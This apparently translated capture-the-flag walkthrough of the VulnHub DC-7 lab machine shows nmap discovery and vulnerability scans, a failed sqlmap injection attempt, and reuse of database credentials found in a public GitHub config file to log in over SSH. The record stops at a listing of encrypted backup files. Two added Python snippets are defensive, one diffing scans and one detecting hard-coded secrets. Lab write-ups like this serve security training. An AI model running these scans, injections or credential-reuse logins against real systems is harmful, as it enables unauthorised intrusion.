VulnHub Target Walkthrough: DC-7

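Summary: This article walks through the full penetration test of the DC-7 target machine: downloading the target, importing it into VMware, configuring the network, running an Nmap scan that finds ports 80 and 22 open, obtaining database credentials through information gathering, and trying them against SSH, which succeeds and gives access to the system. It is suitable for security learners who want to practice the penetration-testing workflow.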

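I. Target download

  1. Index of target downloads: https://download.vulnhub.com/
  2. Use the search function and search for the dc series of targets.
  3. Target used in this walkthrough: DC-7
  4. Operating system: Debian
  5. Download link: https://download.vulnhub.com/dc/DC-7.zip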

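II. Starting the target

  1. After the download completes, open VMware, use File > Open in the top-left corner to import the ova file, then change the network connection mode to NAT.
  2. Screenshot of the target after a successful start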

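III. Scanning and analysis

  1. Lab subnet for this exercise: 192.168.198.0/24. Attacker machine IP: 192.168.198.129
  2. Scan the subnet before starting the target
# -sP is the older alias of -sn (host discovery only, no port scan)
nmap -sP 192.168.198.0/24
# Result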
┌──(root㉿kali)-[/home/varin]
└─# nmap -sP 192.168.198.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 10:12 CST
Nmap scan report for 192.168.198.1
Host is up (0.0094s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.198.2
Host is up (0.00016s latency).
MAC Address: 00:50:56:F7:F2:9C (VMware)
Nmap scan report for 192.168.198.254
Host is up (0.00019s latency).
MAC Address: 00:50:56:F0:9B:51 (VMware)
Nmap scan report for 192.168.198.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.39 seconds

  3. Scan the subnet again with the target started
     1. Target IP obtained: 192.168.198.137
nmap -sP 192.168.198.0/24
# Result
┌──(root㉿kali)-[/home/varin]
└─# nmap -sP 192.168.198.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 16:06 CST
Nmap scan report for 192.168.198.1
Host is up (0.00079s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.198.2
Host is up (0.00021s latency).
MAC Address: 00:50:56:F7:F2:9C (VMware)
Nmap scan report for 192.168.198.137
Host is up (0.00034s latency).
MAC Address: 00:0C:29:9D:C5:A2 (VMware)
Nmap scan report for 192.168.198.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:F0:9B:51 (VMware)
Nmap scan report for 192.168.198.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds

  4. Run a detailed scan against the target IP
     1. Open ports: 22, 80
     2. Open services: SSH, HTTP
     3. Web framework:
nmap -A -v -p 1-65535 192.168.198.137 --script=vuln
# Result
┌──(root㉿kali)-[/home/varin]
└─# nmap -A -v -p 1-65535 192.168.198.137 --script=vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 16:07 CST
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:07
Stats: 0:00:08 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
NSE Timing: About 33.33% done; ETC: 16:09 (0:01:08 remaining)
Completed NSE at 16:08, 34.06s elapsed
Initiating NSE at 16:08
Completed NSE at 16:08, 0.00s elapsed
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Initiating ARP Ping Scan at 16:08
Scanning 192.168.198.137 [1 port]
Completed ARP Ping Scan at 16:08, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:08
Completed Parallel DNS resolution of 1 host. at 16:08, 0.01s elapsed
Initiating SYN Stealth Scan at 16:08
Scanning 192.168.198.137 [65535 ports]
Discovered open port 80/tcp on 192.168.198.137
Discovered open port 22/tcp on 192.168.198.137
Completed SYN Stealth Scan at 16:08, 5.45s elapsed (65535 total ports)
Initiating Service scan at 16:08
Scanning 2 services on 192.168.198.137
Completed Service scan at 16:08, 24.76s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.198.137
NSE: Script scanning 192.168.198.137.
Initiating NSE at 16:08
Completed NSE at 16:10, 114.87s elapsed
Initiating NSE at 16:10
Completed NSE at 16:10, 0.04s elapsed
Nmap scan report for 192.168.198.137
Host is up (0.0033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.198.137
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.198.137:80/
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/search/node
|     Form id: search-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/node/1
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|
|     Path: http://192.168.198.137:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/search/node
|     Form id: search-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/search/node/help
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/search/node
|     Form id: search-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/node/
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|
|     Path: http://192.168.198.137:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|
|     Path: http://192.168.198.137:80/user/password
|     Form id: search-block-form
|     Form action: /search/node
|
|     Path: http://192.168.198.137:80/search/node/
|     Form id: search-form
|     Form action: /search/node/
|
|     Path: http://192.168.198.137:80/search/node/
|     Form id: search-block-form
|_    Form action: /search/node
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /INSTALL.txt: Drupal file
|   /: Drupal version 8
|_  /README.txt: Interesting, a readme.
MAC Address: 00:0C:29:9D:C5:A2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.304 days (since Thu Aug  8 08:53:28 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   3.33 ms 192.168.198.137
NSE: Script Post-scanning.
Initiating NSE at 16:10
Completed NSE at 16:10, 0.00s elapsed
Initiating NSE at 16:10
Completed NSE at 16:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.00 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
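
The before/after comparison used in steps 2 and 3 to find the target's address can be done mechanically; the same diff is how an unexpected device appearing on a subnet is spotted. This is an added example, not part of the original post: the function names are assumptions, and the two samples are abridged from the ping-scan output above.

```python
import re

REPORT = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9.]+)\)?$")
MAC = re.compile(r"^MAC Address: ([0-9A-F:]{17}) \((.*)\)$")

# Abridged from the two scans above (latency lines and .2/.254 omitted).
BEFORE = """\
Nmap scan report for 192.168.198.1
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.198.129
Host is up.
"""
AFTER = """\
Nmap scan report for 192.168.198.1
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.198.137
MAC Address: 00:0C:29:9D:C5:A2 (VMware)
Nmap scan report for 192.168.198.129
Host is up.
"""

def parse_ping_scan(output):
    """Map each live IPv4 address to (mac, vendor), or None when nmap prints no
    MAC line (the scanning host itself, or hosts beyond the local segment)."""
    hosts, current = {}, None
    for raw in output.splitlines():
        line = raw.strip()
        report = REPORT.match(line)
        if report:
            current = report.group(1)   # also handles "name (ip)" report lines
            hosts[current] = None
            continue
        mac = MAC.match(line)
        if mac and current:
            hosts[current] = (mac.group(1), mac.group(2))
    return hosts

def new_hosts(before, after):
    """Hosts present in the second scan but absent from the first."""
    old, new = parse_ping_scan(before), parse_ping_scan(after)
    return {ip: info for ip, info in new.items() if ip not in old}

if __name__ == "__main__":
    for ip, info in new_hosts(BEFORE, AFTER).items():
        print(ip, info)
```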

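IV. Website home page

V. SQLMAP

# The home page has a search box, so try SQL injection against it with sqlmap
# (the URL is quoted so the shell does not treat "?" as a glob character)
sqlmap -u "http://192.168.198.137/search/node?keys=ff" --dbs
# Result: injection failed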

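VI. @DC7USER

# Injection did not work and the site itself has little content, but the page shows the handle @DC7USER
# Try searching for it on Google
# A GitHub project with this name turns up

# Opening it shows that it is a PHP project
# Look at the project's configuration file
# Database user name: dc7user
# Database password: MdR3xOgB7#dW
# Database name: Staff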
<?php
  $servername = "localhost";
  $username = "dc7user";
  $password = "MdR3xOgB7#dW";
  $dbname = "Staff";
  $conn = mysqli_connect($servername, $username, $password, $dbname);
?>
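
From the defender's side, the finding above is a hard-coded password committed to a public repository. The following added example (not from the original post or the DC-7 project; the sample files, the secret-name list and the function name are assumptions) flags string-literal secrets in PHP config files, including a literal passed as the password argument of mysqli_connect() under an innocuous variable name, and shows that a config reading its values from the environment passes.

```python
import re

# $name = "literal";  or  $name = 'literal';
ASSIGN = re.compile(r"""\$(\w+)\s*=\s*(["'])((?:\\.|(?!\2).)*)\2\s*;""")
CONNECT = re.compile(r"mysqli_connect\s*\(([^)]*)\)")
SECRET_NAME = re.compile(r"pass|secret|token|api_?key", re.I)  # assumed name list

# Constructed samples: same shape as the config file above, placeholder values.
LEAKY = """<?php
  $servername = "localhost";
  $username = "appuser";
  $password = "ExamplePassw0rd!";
  $dbname = "Staff";
  $conn = mysqli_connect($servername, $username, $password, $dbname);
?>"""
HARDENED = """<?php
  $servername = getenv("DB_HOST");
  $username = getenv("DB_USER");
  $password = getenv("DB_PASSWORD");
  $dbname = getenv("DB_NAME");
  $conn = mysqli_connect($servername, $username, $password, $dbname);
?>"""

def find_hardcoded_secrets(php_source):
    """Return [(line, variable, redacted value)] for string literals that are
    either named like a secret or passed as mysqli_connect()'s password."""
    literals, password_vars = {}, set()
    for no, line in enumerate(php_source.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "*")):
            continue                               # skip comment lines
        for m in ASSIGN.finditer(line):
            if m.group(3):                         # ignore empty strings
                literals[m.group(1)] = (no, m.group(3))
        for m in CONNECT.finditer(line):
            args = [a.strip() for a in m.group(1).split(",")]
            if len(args) >= 3 and args[2].startswith("$"):
                password_vars.add(args[2][1:])     # 3rd argument is the password
    return [(no, name, value[:2] + "*" * max(len(value) - 2, 0))
            for name, (no, value) in literals.items()
            if SECRET_NAME.search(name) or name in password_vars]

if __name__ == "__main__":
    print(find_hardcoded_secrets(LEAKY))     # one finding on line 4
    print(find_hardcoded_secrets(HARDENED))  # no findings
```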

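VII. MySQL login attempt

# Database user name: dc7user
# Database password: MdR3xOgB7#dW
# Result: login failed

VIII. SSH login attempt

# The scan showed an SSH service; since the MySQL login failed, try the same credentials over SSH
# IP: 192.168.198.137
# User name: dc7user
# Password: MdR3xOgB7#dW
# Result: login succeeded

# Information gathering after login
# One file and one directory
mbox file
backups directory
# The directory contains two files:
website.sql.gpg
website.tar.gz.gpg
# gpg files: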
